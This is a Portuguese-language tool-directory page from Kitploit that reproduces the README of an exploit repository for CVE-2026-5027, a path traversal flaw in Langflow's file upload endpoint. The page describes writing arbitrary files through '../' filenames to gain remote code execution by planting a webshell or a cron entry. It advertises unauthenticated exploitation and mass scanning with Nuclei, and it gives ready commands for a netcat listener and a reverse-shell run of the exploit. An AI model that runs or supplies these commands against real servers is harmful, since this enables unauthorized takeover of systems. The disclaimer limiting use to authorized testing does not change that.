Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-5027 — CVE-2026-5027 | Kitploit
Ferramentas/GitHubGitHub/0xblackash/cve-2026-5027
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHub0xblackash/cve-2026-5027

CVE-2026-5027

CVE-2026-5027

Ver Repositório
11há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🔥 CVE-2026-5027 - Path Traversal no Langflow

Vulnerabilidade de segurança cibernética_ exploit de path traversal

Escrita Arbitrária de Arquivos para RCE
Execução Remota de Código Não Autenticada via Upload de Arquivo

CVE CVSS Exploit

📌 Visão Geral

Langflow sofre de uma vulnerabilidade crítica de path traversal no endpoint de upload de arquivos (POST /api/v2/files).

Um atacante pode enviar um nome de arquivo malicioso contendo sequências ../ para escrever arquivos arbitrários em qualquer lugar do sistema de arquivos do servidor.

Isso facilmente leva a Execução Remota de Código (RCE) total — por exemplo, enviando um webshell ou injetando no crontab.


🛠️ Recursos

  • ✅ Exploração não autenticada (configurações padrão de auto-login)
  • ✅ Prova de Conceito simples (escreve arquivo de teste em /tmp)
  • ✅ Reverse Shell completo via cron (Linux)
  • ✅ Template Nuclei incluído para varredura em massa
  • ✅ Fácil de personalizar a profundidade do traversal

🚀 Início Rápido

1. Prova de Conceito (Teste Seguro)

python3 CVE-2026-5027.py -t http://target:7860/ --proof

Saída esperada se vulnerável:

[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt

2. Reverse Shell Completo

# Start listener
nc -lvnp 4444

# Run exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444

📁 Conteúdo do Repositório

ArquivoDescrição
CVE-2026-5027.pyExploit principal em Python (PoC + RCE)
CVE-2026-5027.yamlTemplate Nuclei para varredura
README.mdEste arquivo

🎯 Exemplos de Uso

cve-2026-5027

Modo Prova

python3 CVE-2026-5027.py -t http://target.com/ --proof

Modo Reverse Shell

python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444

⚠️ Aviso Legal

Este repositório é apenas para fins educacionais e de testes de segurança autorizados.

Use com responsabilidade e apenas em sistemas para os quais você tenha permissão explícita para testar.


Feito com ❤️ para a comunidade red team

Baixar ferramenta